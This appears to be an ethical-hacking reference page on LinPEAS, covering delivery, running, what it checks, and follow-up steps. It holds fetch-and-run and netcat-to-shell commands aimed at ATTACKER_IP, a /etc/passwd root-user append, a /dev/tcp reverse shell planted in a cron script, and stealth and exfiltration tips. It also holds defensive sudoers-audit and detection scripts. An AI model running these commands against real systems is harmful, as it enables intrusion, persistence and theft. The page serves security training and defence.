# LinPEAS
## Overview

LinPEAS (Linux Privilege Escalation Awesome Script) is a shell script that automates the enumeration of potential privilege escalation paths on Linux/Unix/macOS systems. It checks hundreds of vectors (SUID binaries, sudo misconfigurations, writable paths, cron jobs, kernel exploits, and more) and color-codes output by severity.
- **Category:** #privilege-escalation #post-exploitation #linux
- **Phase:** Privilege Escalation
- **Part Of:** PEASS-ng (Privilege Escalation Awesome Scripts Suite); the same project also produces WinPEAS
- **GitHub:** https://github.com/carlospolop/PEASS-ng
## Getting LinPEAS onto a Target

```bash
# Method 1: wget from GitHub (if internet access available)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh

# Method 2: curl pipe (no file written to disk)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Method 3: Host on attacker machine and curl from target
# Attacker:
python3 -m http.server 8080
# Target:
curl http://ATTACKER_IP:8080/linpeas.sh | sh

# Method 4: Transfer via Netcat
# Attacker:
nc -lvnp 4444 < linpeas.sh
# Target:
nc ATTACKER_IP 4444 | sh
```
## Running LinPEAS

```bash
# Basic run (stdout)
./linpeas.sh

# Save output to file
./linpeas.sh | tee /tmp/linpeas_output.txt

# Stream (color) output to the attacker over Netcat, stderr discarded
./linpeas.sh 2>/dev/null | nc ATTACKER_IP 9000

# Quiet mode (less verbose)
./linpeas.sh -q

# Run only specific checks
./linpeas.sh -o SYS_INFORMATION,INTERESTING_FILES
```
## Output Color Legend

| Color | Meaning |
|---|---|
| 🔴 Red / Yellow | High-value findings — likely privesc paths |
| 🟢 Green | Current user/group info |
| 🔵 Cyan | Information, interesting but not critical |
| White | General output |
## What LinPEAS Checks

### System Info
- OS/kernel version → checked against known kernel exploits
- Architecture, hostname, environment variables

### Users & Groups
- Current user and groups
- Sudo permissions (`sudo -l`)
- Users with login shells
- Recently active users

### SUID/SGID Binaries
- Any SUID binary that can be abused (cross-referenced with GTFOBins)

### Sudo Misconfigurations
- `NOPASSWD` entries
- `LD_PRELOAD` / `LD_LIBRARY_PATH` in sudo env
- Wildcard abuse in sudoers

### Cron Jobs
- World-writable cron scripts
- Cron jobs running as root with user-controlled paths

### File Permissions
- Writable `/etc/passwd` or `/etc/shadow`
- Writable service config files
- Files owned by root but world-writable

### Network
- Open ports (internal services not externally visible)
- Hosts file, ARP cache (for pivoting intel)

### Credentials
- Config files containing passwords (db configs, `.env` files, etc.)
- SSH keys (private keys readable by current user)
- Browser saved passwords
- History files (`.bash_history`, `.zsh_history`)

### Software & Services
- Running services and their configurations
- Docker socket access
- NFS exports with `no_root_squash`
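The sudo checks above (NOPASSWD entries, `LD_PRELOAD`/`LD_LIBRARY_PATH` kept via `env_keep`, wildcards in command specs) are easy to audit from the defender's side before LinPEAS ever finds them. The script below is an added example, not code from the PEASS-ng project: it parses sudoers text and reports each risky entry with a remediation hint. The sudoers content is constructed for illustration, and the finding names and severities are this script's own convention.

```python
"""Audit sudoers text for the misconfigurations LinPEAS reports.

Added example, not code from the PEASS-ng project. SAMPLE_SUDOERS is
constructed for illustration; severities and messages are this script's own.
"""
import re

# Constructed sample sudoers content (assumption: not taken from any real host).
SAMPLE_SUDOERS = """\
Defaults    env_reset
Defaults    env_keep += "LD_PRELOAD"
root        ALL=(ALL:ALL) ALL
%admin      ALL=(ALL) ALL
deploy      ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
backup      ALL=(root) NOPASSWD: /usr/bin/tar -czf /backup/*.tgz /var/www/*
alice       ALL=(ALL) NOPASSWD: ALL
"""

# Environment variables that let the caller inject code into a privileged process.
DANGEROUS_ENV = ("LD_PRELOAD", "LD_LIBRARY_PATH")

# user  host=(runas) [tag:]... commands   (simplified sudoers user-spec grammar)
RULE_RE = re.compile(r"^(\S+)\s+([^=\s]+)\s*=\s*(?:\(([^)]*)\))?\s*(.*)$")
TAG_RE = re.compile(
    r"\b(?:NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC|LOG_INPUT|NOLOG_INPUT"
    r"|LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW):"
)


def audit_sudoers(text):
    """Return a list of (severity, line_no, message) for risky entries."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue

        if line.startswith("Defaults"):
            for var in DANGEROUS_ENV:
                if re.search(rf"env_keep\s*\+?=.*\b{var}\b", line):
                    findings.append(("HIGH", line_no,
                        f"{var} is kept by env_keep; remove it so callers cannot "
                        f"preload code into sudo commands"))
            continue

        m = RULE_RE.match(line)
        if not m:
            continue
        user, _host, _runas, cmdspec = m.groups()
        nopasswd = "NOPASSWD:" in cmdspec
        # Strip tags, then split the comma-separated command list.
        commands = [c.strip() for c in TAG_RE.sub("", cmdspec).split(",") if c.strip()]

        if nopasswd and "ALL" in commands:
            findings.append(("HIGH", line_no,
                f"{user} may run ALL without a password; restrict to specific commands"))
        elif nopasswd:
            findings.append(("MEDIUM", line_no,
                f"{user} has NOPASSWD for {', '.join(commands)}; confirm none of "
                f"them can spawn a shell (see GTFOBins)"))
        if any("*" in c for c in commands):
            findings.append(("HIGH", line_no,
                f"{user}: wildcard in command spec; pin exact arguments or wrap "
                f"the call in a root-owned, non-writable script"))
    return findings


if __name__ == "__main__":
    for sev, n, msg in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{sev}] line {n}: {msg}")
```

Run it against `/etc/sudoers` and the files under `/etc/sudoers.d/` (read as root); each finding corresponds directly to one of the sudo items LinPEAS would color red or yellow on the same host.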
## Key Findings to Act On

```bash
# SUID abuse — check GTFOBins
find / -perm -4000 -type f 2>/dev/null

# Writable /etc/passwd (can add root user)
echo 'hacker:$1$salt$hash:0:0:root:/root:/bin/bash' >> /etc/passwd

# Sudo LD_PRELOAD abuse — if env_keep+=LD_PRELOAD in sudoers
# Create a .so, export LD_PRELOAD, run sudo command

# Writable cron script
echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /path/to/cron_script.sh
```
## GTFOBins Reference

For any SUID binary or sudo-allowed command LinPEAS flags, check https://gtfobins.github.io
## OPSEC Notes

LinPEAS writes to disk and generates significant file system activity. For stealth, pipe directly through `curl | sh` or over Netcat to avoid touching disk. The output file in `/tmp` is world-readable by default; write to a less obvious location or exfiltrate immediately.
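Seen from the blue team, the delivery and follow-up commands documented on this page are themselves the detection surface: a `curl`/`nc` pipe into `sh`, a script named `linpeas.sh`, a filesystem-wide SUID sweep, or an append to `/etc/passwd`, several of them from one user in a few minutes. The script below is an added example, not code from PEASS-ng: it runs those patterns over command-line records. The record format (timestamp, user, command line) is an assumption standing in for whatever auditd or EDR collector a team actually uses, and the log lines are constructed.

```python
"""Flag command-line records matching LinPEAS delivery and follow-up activity.

Added example, not code from PEASS-ng. The record format and the log lines are
constructed; the patterns mirror the commands documented on this page.
"""
import re

# Detection rules: (name, pattern applied to the raw command line).
RULES = [
    ("linpeas-script",  re.compile(r"\blinpeas(?:\.sh)?\b", re.IGNORECASE)),
    ("pipe-to-shell",   re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b")),  # curl|wget ... | sh/bash
    ("netcat-to-shell", re.compile(r"\bnc\b.*\|\s*(?:ba)?sh\b")),             # nc ... | sh/bash
    ("suid-sweep",      re.compile(r"\bfind\s+/.*-perm\s+-4000\b")),           # filesystem-wide SUID search
    ("passwd-append",   re.compile(r">>\s*/etc/passwd\b")),                    # append to /etc/passwd
]

# Constructed sample records: "timestamp user cmdline" (format is an assumption).
SAMPLE_LOG = """\
2024-05-01T10:01:02Z www-data curl http://10.0.0.5:8080/linpeas.sh | sh
2024-05-01T10:01:30Z www-data nc 10.0.0.5 4444 | sh
2024-05-01T10:02:11Z www-data find / -perm -4000 -type f 2>/dev/null
2024-05-01T10:03:40Z www-data echo 'x:*:0:0::/root:/bin/bash' >> /etc/passwd
2024-05-01T10:05:00Z alice git pull origin main
2024-05-01T10:06:00Z bob curl -sS https://monitor.example.internal/health
"""


def parse_record(line):
    """Split a 'timestamp user cmdline' record into its three fields."""
    parts = line.split(maxsplit=2)
    if len(parts) != 3:
        return None
    return {"ts": parts[0], "user": parts[1], "cmd": parts[2]}


def scan_log(text):
    """Return one hit per (record, rule) pair that matched."""
    hits = []
    for line in text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        for name, pattern in RULES:
            if pattern.search(rec["cmd"]):
                hits.append({"rule": name, **rec})
    return hits


def rules_per_user(text):
    """Map user -> set of distinct rules fired; several from one user is the strong signal."""
    seen = {}
    for hit in scan_log(text):
        seen.setdefault(hit["user"], set()).add(hit["rule"])
    return seen


if __name__ == "__main__":
    for user, rules in rules_per_user(SAMPLE_LOG).items():
        print(f"{user}: {len(rules)} distinct rules -> {sorted(rules)}")
```

A single `pipe-to-shell` hit is noisy on hosts where installers are legitimately piped into `sh`; the per-user aggregation in `rules_per_user` is what separates the `www-data` sequence above (five distinct rules) from `bob`'s plain health check, which fires nothing.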
## Related Tools

- WinPEAS — Windows equivalent
- Metasploit → `run post/multi/recon/local_exploit_suggester` — similar automated privesc suggestions within a Meterpreter session
- Meterpreter — Common delivery vehicle for LinPEAS on Linux targets
- Netcat — Used to transfer and stream LinPEAS output back to attacker
## Tags

#ethical-hacking #privilege-escalation #linux #post-exploitation #enumeration